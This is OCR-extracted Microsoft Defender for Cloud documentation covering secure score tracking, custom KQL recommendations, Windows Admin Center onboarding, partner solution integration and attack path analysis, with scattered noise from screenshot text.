Secure score tile on the overview page, you're taken to the dedicated secure score page, 
where you'll see the score broken down by subscription. Select a single subscription to 
see the detailed list of prioritized recommendations and the potential effect that 


remediating them will have on the subscription's score. 


Your secure score is shown in the following locations in Defender for Cloud's portal 


pages. 


e Ina tile on Defender for Cloud's Overview (main dashboard): 


oft D 


iption: 


Y Subscriptions C? What's new 


? 73 4 


Azure subscriptions AWS accounts 


D Secure score 


Unhealthy resources 


4101 ‘to harden these resources and improve your 
score, follow the security recommendations 


Current secure score 


) COMPLETED 


Controls vis 


eee COMPLETED 
Y= Recommend... 24/110 
= 


Improve your secure score > 


E, Firewall Manager 


@5 =3 


Firewalls 


ZA 


Firewall policies pegi 


Network protection status 


by resource 
Virtual hubs 0/0 
Virtual networks 8/249 
= 


Improve your network security > 


efender for Cloud | Overview 


GA 


GCP projects 


1a 5984 


Assessed resources 


9 Workload protections 


Resource coverage 


QBs. For full protection, enable 11 resource plans 


Alerts by severity 


Ha 


2K 
I = 
l 


Enhance your threat protection capabilities > 


Tr Inventory 


Unmonitored VMs 


Total Resources 


5984 
D 


T Unhealthy (4101) 
l Healthy (1435) Not applicable (448) 


Explore your resources > 


209 Ọ 7336 


Security alerts 


see 


Active recommendations 


E Regulatory compliance 


Azure Security Benchmark [SH 


1 of 40 passed controls 
= 


Lowest compliance regulatory standards 


CMMC Le 0/55 
NIST SP 800 53 R5 2/55 
= 

1SO 27001 1/20 


Improve your compliance > 


Q Information protection Preview 
h Purview 


Integrated witi 
Resource scan coverage 


1% For tull coverage scan additional resources 


Recommendations & Alerts 
esources 


View classified resources in inventory > 


x 
Insights 

Most prevalent recommendations (by resources) 
E Audit diagnostic setting 1025 
e Append a tag and its value to resou.. 549 
EE, Storage account should use a privat 447 
E a Storage accounts should restrict net 446 
New security alerts 
DO 145 new alerts were detected by 

Defender for Cloud in the last 

48 hours. 
View full alerts list > 5 
EE, Microsoft Defender for SQL on machine 7 
Controls with the highest potential increase 

Remediate vulnerabilities +10% Pai 


rity configurations +6% bei 


+6% (10pt! 


View controls > 


e In the dedicated Secure score page you can see the secure score for your 
subscription and your management groups: 


9 Microsoft Defender for Cloud | Secure Score 


Showing 73 subscriptions 


| P Search (Ctri+/) | « Overall Secure Score Subscriptions with the lowest scores 


E obas74a6 pn 35% (~11 of 31 points) 
? Contoso Hotels mumm 41% (~20 of 48 points) 
© ooedtots pn 43% (~14 of 33 points) 


General 


Ọ overview 9 47% (~27 of 58 points) 
@ 


Getting started 


Z= Recommendations 


@ Security alerts 
3 


Inventory | Ø Search by subscription name 
Community Subscription Ty Secure Score N 
Cloud Security ? Contoso Dev_India w 61% (25 of 41) View recommendations > 


? Contoso Hotels - Dev W 53% (31 of 58) View recommendations > 


O Microsoft Defender for Cloud | Secure Score x 


Showing 73 subscriptions 


| D Search (Ctrl+/ « Your Secure Score is a measure of the security posture of your 
OO subscription: the higher the score, the lower the identified risk level. Learn more > 
General 


i 1 1 MANAGEMENT GROUPS 5 SUBSCRIPTIONS 
D overview 


@ Getting started 


| Ø Search by subscription ... | | Collapse All | | Expand All Group by management groups; 


š= Recommendations 


e jame ecure Score nhealthy res... Total resources 
Os ty alert N Sı S Unhealth Total 
ecurity alerts 
i gre pelo] 72f988bf ® Restricted 2396 5240 
a, Community via) Contoso (Showing 5 of 5) 59 145 View recommendations > 
pelo) IT (Showing 2 of 2) 17 29 View recommendations > 
Cloud Security 
Ve) App Team (Showing 2 of 2 iew recommendations > 
OI App Team (Sh 2 of 2) 17 29 Vi d 
© secure Score 
‘ontoso Dev_India é of iew recommendations > 
Cont Dev_Ind W 61% (25 of 41) 4 9 vi dati 
@ Regulatory compliance 
? Contoso Dev_EUS W 43% (140f33) 13 20 View recommendations > 


O Microsoft Defender for Cloud R . 
Jo) Infra Team (Showing 0of0) Not applicable 


© Note 


Any management groups for which you don't have sufficient permissions, will 
show their score as “Restricted.” 


e At the top of the Recommendations page: 


Se Microsoft Defender for Cloud | Recommendations 


wing 73 subscriptions 


| P Search (Ctri+/) | d 4 Download CSV report 
General 


© Overview 


@ Getting started 


ZZ Recommendations 


Secure Score 


Recommendations status 


SZ E ) 1 completed control 15 Total 
Security alerts fe) E = 
9 46% (~27 of 58 points) 
© inventory 
YZ 21 completed recommendations 68 Total 
@ Community —— 
Cloud Security 


© Secure Score 


GZ Regulatory compliance Ø Search recommendations 


Q workload protections 


Management Controls Potential score increase 
I Pricing & settings > Remediate vulnerabilities + 10% (6 points) 

©: Security policy > Enable encryption at rest + 6% (4 points) 
Security solutions > Remediate security configurations + 6% (3 points) 

ZA Workflow automation > Manage access and permissions + 5% (3 points) 

ZZ Coverage > Encrypt data in transit + 5% (3 points) 

@ Cloud connectors > Apply adaptive application control + 4% (3 points) 


Unhealthy resources 
56 of 59 resources 
80 of 90 resources 
61 of 71 resources 
7 of 15 resources 
55 of 83 resources 


46 of 55 resources 


© You have limited permissions to some of your subscriptions. You will not be able to receive Secure Score information for those subscriptions. 


Resource health 


Unhealthy 
198 


361 Healthy 
TOTAL 52 


Not applicable 


111 


Group by controls: €D On 


Resource Health 


Get your secure score from the REST API 


You can access your score via the secure score API. The API methods provide the 


flexibility to query the data and build your own reporting mechanism of your secure 


scores over time. For example, you can use the Secure Scores API to get the score for a 


specific subscription. In addition, you can use the Secure Score Controls API to list the 


security controls and the current score of your subscriptions. 


Get single secure score 


Sample Request 


HTTP 


BS Copy 


GET https: //management.azure.com/subscriptions/20ff7£c3-e762-44dd-bd96-b71116dcdc23/providers/Microsoft.Security 


/secureScores/ascScore?api-version=2020-01-01-preview 


Sample Response 


Status code: 200 


JSON 


{ 


D Copy 


"id": "/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/providers/Microsoft.Security/secureScores/ascScore", 


“name”: "“ascScore”, 
“type”: “Microsoft.Security/secureScores”, 
"properties": { 
“displayName”: "ASC score”, 
“score”: { 
“max”: 13, 
“current”: 3 
} 
} 
} 


For examples of tools built on top of the secure score API, see the secure score area of 


our GitHub community”. 


Get your secure score from Azure Resource 
Graph 


Azure Resource Graph provides instant access to resource information across your cloud 
environments with robust filtering, grouping, and sorting capabilities. It's a quick and 
efficient way to query information across Azure subscriptions programmatically or from 
within the Azure portal. Learn more about Azure Resource Graph. 


To access the secure score for multiple subscriptions with Azure Resource Graph: 


1. From the Azure portal, open Azure Resource Graph Explorer. 


Microsoft Azure 


Dashboard 


0 Microsoft Defender for C 


howing 73 subscriptions 


Services Seea 


Lae samasta 2a 


2. Enter your Kusto query (using the following examples for guidance). 


e This query returns the subscription ID, the current score in points and as a 
percentage, and the maximum score for the subscription. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/securescores' 

| extend current = properties.score.current, max = 
todouble(properties.score.max) 


| project subscriptionId, current, max, percentage = ((current / 
max) *10@) 


e This query returns the status of all the security controls. For each control, 


you'll get the number of unhealthy resources, the current score, and the 
maximum score. 


Kusto 


SecurityResources 

| where type == 
"microsoft.security/securescores/securescorecontrols' 

| extend SecureControl = properties.displayName, unhealthy = 
properties.unhealthyResourceCount, currentscore = 
properties.score.current, maxscore = properties.score.max 

| project SecureControl , unhealthy, currentscore, maxscore 


3. Select Run query. 


Tracking your secure score over time 


Secure Score Over Time report in workbooks page 


Defender for Cloud's workbooks page includes a ready-made report for visually tracking 
the scores of your subscriptions, security controls, and more. Learn more in Create rich, 
interactive reports of Defender for Cloud data. 


Microsoft Defender for Cloud | Workbooks | Secure Score Over Time d 


Showing 64 subscriptions 


@ workbooks EA Edit OO ei x © 


e 


? Help 


Y= Top recommendations with recent increase in unhealthy resources 
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boak = D Enable auditing and... 
Disk encryption should be applied on virtual machines 32 20% D Protect your applicat.. 
= 
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Vulnerabilities in security configuration on your machines shouk 27 10% i Remediate vulnerabil 
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Power BI Pro dashboards 


If you're a Power BI user with a Pro account, you can use the Secure Score Over Time 


Power BI dashboard to track your secure score over time and investigate any changes. 


Q Tip 


You can find this dashboard, as well as other tools for working programmatically 


with secure score, in the dedicated area of the Microsoft Defender for Cloud 


community on GitHub: https://github.com/Azure/Azure-Security- 


Center/tree/master/Secure%20Score E 


The dashboard contains the following two reports to help you analyze your security 


status: 


e Resources Summary - provides summarized data regarding your resources’ health. 


e Secure Score Summary - provides summarized data regarding your score 


progress. Use the “Secure score over time per subscription” chart to view changes 
in the score. If you notice a dramatic change in your score, check the “detected 
changes that may affect your secure score” table for possible changes that could 
have caused the change. This table presents deleted resources, newly deployed 
resources, or resources that their security status changed for one of the 


recommendations. 


Secure Score Summary Ô 


> Give us feedback 
Aggregated score for all subscriptions 


Current aggregated secure score 
40 


Aggregated score 


Score changes tracking 


Aggregated secure score over time 


Current version: v2 (Update) 
Latest version: v2 i 
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Over time tracking 


Secure score over time per subscription (top 60 subscriptions) 
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40 


Score trends per subscription 


Full Subscription Name 
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Partner- Managed-Subscription 6.67% 0.00% 


(85f90e8e-7b53-4664-b9d3- 
&31ed017653) 
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Score Change 


Changed 


Current %Score 7 Days Change 
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Deleted 


30 Days Change 
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Detected changes that may affected your secure score* 


New 


Security Status Resources Resources 
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10/14/2020 12:00:00 AM 
Ə 10/13/2020 12:00:00 AM 
10/12/2020 12:00:00 AM 
3 10/7/2020 12:00:00 AM 
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SG e e ba B 


* k may take up to 24 hours for changes to appear in the detected changes 


Next steps 


0 


See SO 


0 


SS pe 


Controls score over time 
Control Name 


Average of %Score 


This article described how to access and track your secure score. For related material, 


see the following articles: 


e Learn about the different elements of a recommendation 


e Learn how to remediate recommendations 


e View the GitHub-based tools for working programmatically with secure score E 


Create custom recommendations and 
security standards 


Article e 08/03/2023 
Recommendations give you suggestions on how to better secure your resources. 


Security standards contain comprehensive sets of security recommendations to help 


secure your cloud environments. 


Security teams can use the readily available recommendations and regulatory standards 
and also can create their own custom recommendations and standards to meet specific 


internal requirements in their organization. 


Microsoft Defender for Cloud provides the option of creating custom recommendations 
and standards for AWS and GCP using KQL queries. You can use a query editor to build 
and test queries over your data. 


There are three elements involved when creating and managing custom 


recommendations: 


e Recommendation - contains: 
o Recommendation details (name, description, severity, remediation logic, etc.) 
o Recommendation logic in KQL. 
o The standard it belongs to. 
e Standard — defines a set of recommendations. 
e Standard assignment - defines the scope that the standard evaluates (for example, 
specific AWS accounts). 


Prerequisites 


Aspect Details 


Required/preferred environmental This preview includes only AWS and GCP recommendations. 


requirements This feature will be part of the Defender CSPM plan in the 
future. 

Required roles & permissions Security Admin 

Clouds: OO National (Azure Government, Microsoft Azure operated 


by 21Vianet) Commercial clouds 
* National (Azure Government, Microsoft Azure operated 
by 21Vianet) 


Create a custom recommendation 
1. In Microsoft Defender for Cloud, select Environment Settings. 
2. Select the relevant account / project. 


3. Select Standards. 
4. Select Create and then select Recommendation. 


Home > Microsoft Defender for Cloud | Environment settings 


= Settings | Standards 


Showing account 


P Search C) Refresh 


Settings 


Settings 


Standard 


mendations 
= Standards Security standards contain comprehensiv 


a e ) Se h y name 
Policy settings P Searc by name 


© Governance rules (preview) Showing 1-10 of 14 items 


5. Fill in the recommendation details (for example: name, severity) and select the 
standard/s you'd like to add this recommendation to. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Standards > 


Create custom recommendation 


@ Recommandations details (2) Recommendation query (©) Review and create 
Name * | 
Description 


E 
Remediation description © 
Severity * v 
Standards © v | 


6. Write a KQL query that defines the recommendation logic. You can write the query 
in the "recommendation query" text box or use the query editor. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Standards 
Create custom recommendation 
(~) Recommandations details © Recommendation query 2) Review and create 


Create a recommendation query 
Use the query editor in order to build or test your query 


Recommandations query * © 


7. Select Next and review the recommendations details. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Standards 


Create custom recommendation 


GO Recommandations details GO Recommendation query GO Review and create 


Recommendation details 


Name Custom recommendation 

Description Custom recommendations description 

Remediation description Remediation description 

Severity Medium Q 
Standards No custom standards selected for this scope 


8. Select Save. 


Create a custom standard 


1. In Microsoft Defender for Cloud, select Environment Settings. 
2. Select the relevant account / project. 
3. Select Standards. 


4. Select Add and then select Standard. 


Microsoft Azure (Preview) 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


y= Settings | Standards 


Showing account 


|o Search (Ctrl+/) | « dU Refresh 


wy 
2 
= 


sments (previ: 
Defender plans Assessment 


$= Standards Security standards contain comprehensiv: 


i K Ø Search by name 
Policy settings 


© Governance rules (preview) Showing 1-10 of 12 items 


Name 7 a 


5. Fill in a name and description and select the recommendation you want to be 
included in this standard. 


Add Standard x 


Scope MOC Containers demo 


A standard contains a set of security recommendations and defines the scope on 
which they run. Add a built-in regulatory compliance standard, or create a custom 
standard 


O Existing standard 


@) New standard 


Name * 


Select a name 


Description * 


Write a Gescriptior 


Assessments * © 
0 selected bai 


6. Select Save; the new standard will now be assigned to the account/project you've 
created it in. You can assign the same standard to other accounts / projects that 
you have Contributor and up access to. 


Create new queries using the query editor 


In the query editor you have the ability to run your queries over your raw data (native 
API calls). To create a new query using the query editor, select the 'open query editor’ 
button. The editor will contain data on all the native APIs we support to help build the 
queries. The data appears in the same structure as in the API. You can view the results of 
your query in the Results pane. The How to tab gives you step by step instructions for 
building your query. 


Custom recommendations (preview) 


D Run query + New query AP Feedback ? Howto 


Categories Tables Query x Query 2 x 


1 // Here is an example query with instructions, to help you get started with writing your queries 

// The recommendation in this example is: “Stopped EC2 instances should be removed after a specified time period” 
3 // Start the query with the table name - "“RawEntityMetadata”™ 
4 RawEntityMetadata 

// Write the cloud name and resource type. You can choose the resource type in the “categories” tab. 

where Environment == 'AWS' and Identifiers.Type == ‘ec2.instance’ 

// Write the relevant rows for your query: 
8 extend State = tolower(tostring(Record.State.Name.Value)) 
autoscaling.autoscalinggroupnan 9 | extend StoppedTime = todatetime(tostring(Record.StateTransitionReason)) 

10 // Define condition which determine if the resource is healthy/unhealthy - keep this row as it is and edit only the condition: 

iformation.resourcesumma 11 | extend HealthStatus = iff(not(State == ‘stopped’ and StoppedTime < ago(3@d)), "HEALTHY, ‘UNHEALTHY’ ) 
12 // Return all the original columns - keep this row as it is: 
13 | project Id, Name, Environment, Identifiers, AdditionalData, Record, HealthStatus 


jtrail.trai Get started Results 
o status X 


Steps for building a query 


1. The first row of the query should include the environment and resource type. For 
example: | where Environment == 'AWS' and Identifiers.Type == 'ec2.instance' 


2. The query must contain an "iff" statement that defines the healthy or unhealthy 
conditions. Use this template and edit only the "condition": "| extend HealthStatus 
= iff(condition, 'UNHEALTHY','HEALTHY’)". 


3. The last row should return all the original columns: "| project Id, Name, 
Environment, Identifiers, AdditionalData, Record, HealthStatus". 


O Note 


The Record field contains the data structure as it is returned from the AWS / 
GCP API. Use this field to define conditions which will determine if the 
resource is healthy or unhealthy. 

You can access internal properties of the Record field using a dot notation. 
For example: | extend EncryptionType = Record.Encryption.Type. 


Additional instructions 


e No need to filter records by Timespan. The assessment service filters the most 
recent records on each run. 

e No need to filter by resource ARN, unless intended. The assessment service will run 
the query on assigned resources. 

e If a specific scope is filtered in the assessment query (for example: specific account 
ID), it will apply on all resources assigned to this query. 

e Currently it is not possible to create one recommendation for multiple 


environments. 


Next steps 


You can use the following links to learn more about Kusto queries: 


KQL Quick Reference 
Kusto Query Language (KQL) overview 


Must Learn KOL Part 1: Tools and Resources Ei 


What are security policies, initiatives, and recommendations? 


Protect Windows Admin Center 
resources with Microsoft Defender for 


Cloud 


Article e 06/14/2023 


Windows Admin Center is a management tool for your Windows servers. It's a single 
location for system administrators to access most the most commonly used admin tools. 
From within Windows Admin Center, you can directly onboard your on-premises servers 
into Microsoft Defender for Cloud. You can then view a summary of your security 
recommendations and alerts directly in the Windows Admin Center experience. 


When you've successfully onboarded a server from Windows Admin Center to Microsoft 
Defender for Cloud, you can: 


e View security alerts and recommendations inside the Defender for Cloud extension 
in Windows Admin Center. 


e View the security posture and retrieve other detailed information of your Windows 
Admin Center managed servers in Defender for Cloud within the Azure portal (or 
via an API). 


Through the combination of these two tools, Defender for Cloud becomes your single 
pane of glass to view all your security information, whatever the resource: protecting 
your Windows Admin Center managed on-premises servers, your VMs, and any other 
PaaS workloads. 


Onboard Windows Admin Center managed 
servers into Defender for Cloud 


1. From Windows Admin Center, select one of your servers, and in the Tools pane, 
select the Microsoft Defender for Cloud extension: 


Windows Admin Center Server Manager 


wac2016chshum 


Tools < 


earch Too | S p 


Ta 


% Local Users & Groups ee 
+ Network 
PowerShell 

TZ Processes 

EE Registry 

X Remote Desktop 
Sd Roles & Features 
EA Scheduled Tasks 
O Services 

= Storage 

EO Storage Replica 


E] Updates 
Extensions 


Microsoft Defender for Cloud 


Ys Security = 


O Note 


If the server is already onboarded to Defender for Cloud, the set-up window 
will not appear. 


2. Select Sign in to Azure and set up. 


Secure your Server with Microsoft Defender for Cloud 
Start a 30-day free trial 


Microsoft Defender for Cloud provides unified security management and 
advanced threat protection across hybrid cloud workloads. 


Get an overview about Microsoft Defender for Cloud D 


Sign in to Azure and set up 


3. Follow the instructions to connect your server to Defender for Cloud. After you've 
entered the necessary details and confirmed, Defender for Cloud makes the 
necessary configuration changes to ensure that all of the following are true: 


e An Azure Gateway is registered. 

e The server has a workspace to report to and an associated subscription. 

e Defender for Cloud's Log Analytics solution is enabled on the workspace. This 
solution provides Microsoft Defender for Cloud's features for all servers and 
virtual machines reporting to this workspace. 

e Microsoft Defender for Servers is enabled on the subscription. 

e The Log Analytics agent is installed on the server and configured to report to 
the selected workspace. If the server already reports to another workspace, 
it's configured to report to the newly selected workspace as well. 


O Note 


It may take some time after onboarding for recommendations to appear. In 
fact, depending on on your server activity you may not receive any alerts. To 
generate test alerts to test your alerts are working correctly, follow the 
instructions in the alert validation procedure. 


View security recommendations and alerts in 
Windows Admin Center 


Once onboarded, you can view your alerts and recommendations directly in the 
Microsoft Defender for Cloud area of Windows Admin Center. Select a recommendation 


or an alert to view them in the Azure portal. There, you'll get additional information and 
learn how to remediate issues. 


Microsoft Defender for Cloud = preview © 


Subscription name Server n 
Sub MKCY Protected by Microsoft Defender for Cloud 


ure Security Center? 
urity capabilitiesc3 


Recommendations © 


Low severity 
1 


© Refresh 


Medium severity | High severity 


Microsoft Defender for Cloud test alert (not a threat) 


a 


View security recommendations and alerts for 
Windows Admin Center managed servers in 
Defender for Cloud 


From Microsoft Defender for Cloud: 


e To view security recommendations for all your Windows Admin Center servers, 
open asset inventory and filter to the machine type that you want to investigate. 
select the VMs and Computers tab. 


e To view security alerts for all your Windows Admin Center servers, open Security 
alerts. Select Filter and ensure only "Non-Azure" is selected: 


Dashboard > Microsoft Defender for Cloud 


Ş Microsoft Defender for Cloud | Security alerts © 


Showing subscription 'Contoso Hotels' 


Y Filter | 4 Download csv report ZG Suppression rules (preview) 


15 


10 
| | 


Next steps 


Integrate security solutions in Microsoft Defender for Cloud 
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Integrate security solutions in Microsoft 
Defender for Cloud 


Article e 01/24/2023 


This document helps you to manage security solutions already connected to Microsoft 
Defender for Cloud and add new ones. 


Integrated Azure security solutions 


Defender for Cloud makes it easy to enable integrated security solutions in Azure. 
Benefits include: 


e Simplified deployment: Defender for Cloud offers streamlined provisioning of 
integrated partner solutions. For solutions like antimalware and vulnerability 
assessment, Defender for Cloud can provision the agent on your virtual machines. 
For firewall appliances, Defender for Cloud can take care of much of the network 
configuration required. 

e Integrated detections: Security events from partner solutions are automatically 
collected, aggregated, and displayed as part of Defender for Cloud alerts and 
incidents. These events are also fused with detections from other sources to 
provide advanced threat-detection capabilities. 

e Unified health monitoring and management: Customers can use integrated 
health events to monitor all partner solutions at a glance. Basic management is 
available, with easy access to advanced setup by using the partner solution. 


Currently, integrated security solutions include vulnerability assessment by Qualys” and 
Rapid7 £. 
© Note 


Defender for Cloud does not install the Log Analytics agent on partner virtual 
appliances because most security vendors prohibit external agents running on their 
appliances. 


Learn more about the integration of vulnerability scanning tools from Qualys, including 
a built-in scanner available to customers that enable Microsoft Defender for Servers. 


Defender for Cloud also offers vulnerability analysis for your: 


e SQL databases - Explore vulnerability assessment reports in the vulnerability 
assessment dashboard 

e Azure Container Registry images - Use Microsoft Defender for container registries 
to scan your images for vulnerabilities 

e Amazon AWS Elastic Container Registry images - Use Microsoft Defender for 


container registries to scan your images for vulnerabilities 


How security solutions are integrated 


Azure security solutions that are deployed from Defender for Cloud are automatically 
connected. You can also connect other security data sources, including computers 
running on-premises or in other clouds. 


Home > Microsoft Defender for Cloud 


sus Microsoft Defender for Cloud | Security solutions d 
ZE Showing 14 subscriptions 

& Search | Y Filter 

General V Connected solutions (4) 

View all security solutions currently connected to Defender for Cloud, monitor the health of solutions, and access the solutions’ management tools for advanced configuration. 


CheckPoint-Firewall-Cen... Barracuda © QualysVa1 MicrosoftWaf 


CHECK POINT BARRACUDA NETWORKS, INC. QUALYS, INC. MICROSOFT 
Web Application Firewall Vulnerability Assessment 


D overview 
@ Getting started 
ZZ Recommendations 


AU Security alerts 


Next Generation Firewall Saas-based Web Application Firewall 


ASC DEMO ASC DEMO ASC DEMO ASC DEMO 
TZ Inventory 
a y review) 
E Security Explorer (Preview) A stopped reporting © Not reported iv) Healthy o Healthy 
@ workbooks 
GO Community VIEW VIEW VIEW VIEW 


oC Diagnose and solve problems 


Cloud Security WV Add data sources (3) 


Connect your security solution to Defender for Cloud. 
Ọ Security posture y y 


@ Regulatory compliance 


D workload protections 
E, Firewall Manager 


E DevOps Security (Preview) 


EA Non-Azure servers 


MICROSOFT 


Onboard your non-Azure computers to 
Defender for Cloud and gain security 
assessment, recommendations and 
more powerful features 


ON) siem 
SELECTED SIEMS 


Integrate Microsoft Defender for Cloud 
alerts into SIEM for a central 
monitoring, See the list of supported 
SIEMs 


Azure Application 
Gateway WAF 
MICROSOFT 


Deploy Azure's WAF to protect your 
web applications from common threats. 
WAF's security alerts will be shown in 
the Defender for Cloud's alerts queue. 


Management 


I Environment settings ADD ADD ADD Q 


E Security solutions 


ZA Workflow automation 


Manage integrated Azure security solutions 
and other data sources 


1. From the Azure portal Z, open Defender for Cloud. 
2. From Defender for Cloud's menu, select Security solutions. 


From the Security solutions page, you can see the health of integrated Azure security 
solutions and run basic management tasks. 


Connected solutions 


The Connected solutions section includes security solutions that are currently 
connected to Defender for Cloud. It also shows the health status of each solution. 


V Connected solutions (4) 


View all security solutions currently connected to Microsoft Defender for Cloud, monitor the health of solutions, and access the solutions’ management tools for advanced configuration. 


CheckPoint-Firewall-Cen... MicrosoftWaf TE Barracuda © QualysVa1 


CHECK POINT MICROSOFT BARRACUDA NETWORKS, INC. QUALYS, INC. 
Next Generation Firewall Saas-based Web Application Firewall Web Application Firewall Vulnerability Assessment 
A Stopped reporting A Stopped reporting © Not reported @ Healthy 

VIEW VIEW VIEW VIEW 


The status of a security solution can be: 


e Healthy (green) - no health issues. 

e Unhealthy (red) - there's a health issue that requires immediate attention. 

e Stopped reporting (orange) - the solution has stopped reporting its health. 

e Not reported (gray) - the solution hasn't reported anything yet and no health data 
is available. A solution's status may be unreported if it was connected recently and 
is still deploying. 


O Note 


If health status data is not available, Defender for Cloud shows the date and time of 
the last event received to indicate whether the solution is reporting or not. If no 
health data is available and no alerts were received within the last 14 days, 
Defender for Cloud indicates that the solution is unhealthy or not reporting. 


Select VIEW for additional information and options such as: 


e Solution console - Opens the management experience for this solution. 

e Link VM - Opens the Link Applications page. Here you can connect resources to 
the partner solution. 

e Delete solution 

e Configure 


Dashboard > Microsoft Defender for Cloud | Security solutions > Qualys 


Qualys 


EA Solution console ‘@ Link VM DI Delete solution £03 Configure 


Partner solution name Qualys for Azure 

Type Vulnerability Assessment 
Integration mode Semi-automatically provisioned 
Status @ Healthy 


Note: Agent status may have up to 8 hours delay 


Associated resources 


Resource name Ty, Health 
BA vm3 GO 
een Containers-Demo-Ubutnu OO 


e vmi O 


Discovered solutions 


Defender for Cloud automatically discovers security solutions running in Azure but not 
connected to Defender for Cloud and displays the solutions in the Discovered solutions 
section. These solutions include Azure solutions, like Azure AD Identity Protection, and 
partner solutions. 


O Note 


Enable advanced protections at the subscription level for the discovered solutions 
feature. Learn more in Quickstart: Enable enhanced security features. 


Select CONNECT under a solution to integrate with Defender for Cloud and be notified 
of security alerts. 
Add data sources 


The Add data sources section includes other available data sources that can be 
connected. For instructions on adding data from any of these sources, select ADD. 


V Add data sources (3) 


Connect your security solution to Microsoft Defender for Cloud. 


Non-Azure servers 
Be. 


MICROSOFT 


Onboard your non-Azure computers 
to Microsoft Defender for Cloud and gain 
security assessment, 
recommendations and more 

powerful features 


ADD 


Next steps 


le SIEM 


SELECTED SIEMS 
Integrate Microsoft Defender for Cloud alerts 


into SIEM for a central monitoring. 
See the list of supported SIEMs 


ADD 


Azure Application 
Gateway WAF 


MICROSOFT 


Deploy Azure's WAF to protect your 
web applications from common 
threats. WAF's security alerts will be 
shown in the Microsoft Defender for Cloud 
alerts queue. 


ADD 


In this article, you learned how to integrate partner solutions in Defender for Cloud. To 


learn how to set up an integration with Microsoft Sentinel, or any other SIEM, see 


Continuously export Defender for Cloud data. 


Identify and remediate attack paths 
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Defender for Cloud's contextual security capabilities assists security teams in the 
reduction of the risk of impactful breaches. Defender for Cloud uses environment 
context to perform a risk assessment of your security issues. Defender for Cloud 
identifies the biggest security risk issues, while distinguishing them from less risky 
issues. 


Attack path analysis helps you to address the security issues that pose immediate 
threats with the greatest potential of being exploited in your environment. Defender for 
Cloud analyzes which security issues are part of potential attack paths that attackers 
could use to breach your environment. It also highlights the security recommendations 
that need to be resolved in order to mitigate it. 


You can check out the full list of Attack path names and descriptions. 


Availability 


Aspect Details 
Release state GA (General Availability) for Azure, AWS 
Preview for GCP 
Prerequisites - Enable agentless scanning, or Enable Defender for Server P1 (which includes 


MDVM) or Defender for Server P2 (which includes MDVM and Qualys). 

- Enable Defender CSPM 

- Enable agentless container posture extension in Defender CSPM, or Enable 
Defender for Containers, and install the relevant agents in order to view attack 
paths that are related to containers. This also gives you the ability to query 
containers data plane workloads in security explorer. 


Required plans - Defender Cloud Security Posture Management (CSPM) enabled 
Required roles - Security Reader 
and permissions: e Security Admin 
- Reader 
- Contributor 
- Owner 
Clouds: @ commercial clouds (Azure, AWS, GCP) 


X National (Azure Government, Azure China 21Vianet) 


Features of the attack path overview page 


The attack path page shows you an overview of all of your attack paths. You can also see 
your affected resources and a list of active attack paths. 


Attack paths 
Here you 


you can see the open attack paths on the selected subscriptions. 


© 1516 % 547 æ 19 
Total attack paths Affected resources Active recommendations 
Attack path Ty, Environment tN Paths count Ty Risk categories Affected resources 
VM with high severity vulnerabilities has read permission to a Key Vau zure 1 Credentials exposure, Compute abuse GA D 
1 Credentials exposure, Compute abuse E SA D 
6 Compute abuse Ls g 
105 Compute abuse EKA B 
28 Credentials exposure bi ZA SO 
1291 42%? = bl = 
22 Subscription/account takeover 2 ¢ 


Page|} \ | of 1 


On this page you can organize your attack paths based on name, environment, paths 
count, risk categories. 


For each attack path, you can see all of risk categories and any affected resources. 


The potential risk categories include credentials exposure, compute abuse, data 
exposure, subscription and account takeover. 


Learn more about the cloud security graph, attack path analysis, and the cloud security 
explorer?. 


Investigate and remediate attack paths 


You can use Attack path analysis to locate the biggest risks to your environment and to 
remediate them. 


To investigate and remediate an attack path: 
1. Sign in to the Azure portal £. 


2. Navigate to Microsoft Defender for Cloud > Attack path analysis. 


Home > 


a] Microsoft Defender for Cloud | Overview 


Showing subs Cyberse 
P Search Y Subscriptions C What's new 
General SE 
e ti 63 Ou © 3972 ZEA © 188 Ọ 6210 
Over 
de Azure subscriptions AWS accounts GCP projects Assessed resources Active recommendations Attack paths Security alerts 
e Getting started 
Recommendations 
© Attack path anal © Security posture G Regulatory compliance Defender for APIs (Preview) - Now Available 
D security alerts [5] Defender for APIs offers protection, detection, and response 
© peren = Microsoft cloud security benchmark coverage for APIs, You can investigate and improve your API 
b % 146/177 E 26/34 © 188 TERE erte prictitize vulnerabiity fires; aora 
P. Cloud Security Explorer 
Pet Unassigned Overdue Attack paths n active threats against the OWASP API Top 10 risks. 

B Workbooks recommendation recommendations 

Secure score Lowest compliance regulatory standards 
S Comunity by passed controls 
@ Diagnose and solve problems On Click here to learn more > 

erre E CMMC Level 3 2/55 
= 
Cloud Security e 
35x O aws 29% SWIFT CSP CSCF v2020 a New default setting for Defender for servers’ vulnerability assessment solution 
© security posture secure scone — = 
Canada Federal PBMM 2/26 Q Vulnerability assessment solutions are essential to safeguard 
ee % = 
© Regulatory cornpliance eb Go machines from cyberattacks and data breaches. Microsoft 
Ọ workload protections Defender Vulnerability Management (MDVM) is now enabled 
EEEN (default) as a built-in solution in the Defender for Servers plan 
d Expl sture > i a liance > 
OO E iaia aic that doesn't have a VA solution selected. Enabling it by default 

© Devops security (preview) ensures a VA solution is enabled wherever one was missi 
Management Remediate vulnerabilities | D Learn more | X Pe 
D Environment settings 9 Workload protections Eø Inventory 
B ebagi Defender for Servers security alerts deprecation 

Resource coverage Unmonitored VMs 
$3 Workflow automation Following quality improvement process. some security alerts for 

99% For fuli protection, enable 2 resource plans 1B To better protect your organization, we recommend installing Windows and Linux servers, were deprecated from Defender for 


3. Select an attack path. 


Home > Microsoft Defender for Cloud | Recommendations > 


Microsoft Defender for Cloud | Attack paths x 


Showing 14 subscriptions. 


Learn more Gi Guides & Feedback 
Attack path by category 


v— 
GO EAS %= 

y= pe rro 
Total attack paths Affected resources Active recommendations I Compute abuse (2) Credentials exposure (1) 


| Attack path name Attack paths == All Risk categories == All Resource types == All Reset filters 


Attack path ty, Environment ty, Paths count ty, Risk categories 
@ Internet exposed VM has high severity vulnerabilities and re... Azure 1 Credentials exposure, Compute abuse 
© Internet exposed VM has high severity vulnerabilities Azure 1 Compute abuse 


© Note 


An attack path may have more than one path that is at risk. The path count 
will tell you how many paths need to be remediated. If the attack path has 
more than one path, you will need to select each path within that attack path 
